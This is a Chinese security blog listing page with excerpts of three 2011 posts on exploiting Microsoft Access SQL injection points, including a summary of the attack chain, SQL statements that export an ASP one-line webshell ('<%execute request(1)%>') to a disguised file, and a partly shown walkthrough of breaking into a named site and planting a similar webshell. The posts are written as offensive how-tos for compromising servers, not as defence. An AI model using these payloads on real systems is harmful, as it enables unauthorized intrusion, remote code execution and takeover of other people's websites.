Access注入点高级运用总结

分类:安全 | 2011-09-13 | 撸过 1,135 次
0人扯谈

信赖Access注入点是人人看到最多的了,一样平常敷衍 办法就是:
猜表猜段猜内容---MD5---去靠山---看上传,备份,设置信息等等---上WEBSEHLL---提权.这是最常见和最普及 的ACCESS注入点应用行动 了.不外这里存在太多的不定因素,乐成 率非常低.任何一步失败,都也许让你不知怎样是好..

但是ACCESS就只有这么点能耐了么?答案是否定 的.下面我们来看看,都有哪些地方 是可以改善和进一步发挥 的.PS,我信赖行动 确定不止这些,只是创造的人都本身用着不公然 偷着乐罢了..

 
---------------------------------------[......]

继续阅读

access导出webshell

分类:安全 | 2011-08-23 | 撸过 419 次
0人扯谈

create table cmd(shell text)
insert into cmd (shell) values('<%execute request(1)%>')
SELECT shell into [fuck] in 'D:\web\me\backdoorx\asp.asp;x.xls' 'EXCEL 4.0;'from cmd

 

Access导出一句话拿shell实战

分类:安全 | 2011-08-17 | 撸过 1,147 次
2人扯谈

目标站:
http://www.webshell.cc

我艹,开头太简单了,直接啊D搞定一切,就连TM的管理员md5还那么弱智,让我跑出来了,囸!直接进后台:

 

 

 


 

 
看到数据库备份我笑了,哈哈哈!老方法本地备份突破下,结果发现丫的不行!目录是只读的。

不过图1中有执行SQL语句,重点来了:

执行代码:

1.create table cmd (a varchar(50))

2.insert into cmd (a) values (‘<%execute request(chr(35))%>’)

3.select[......]

继续阅读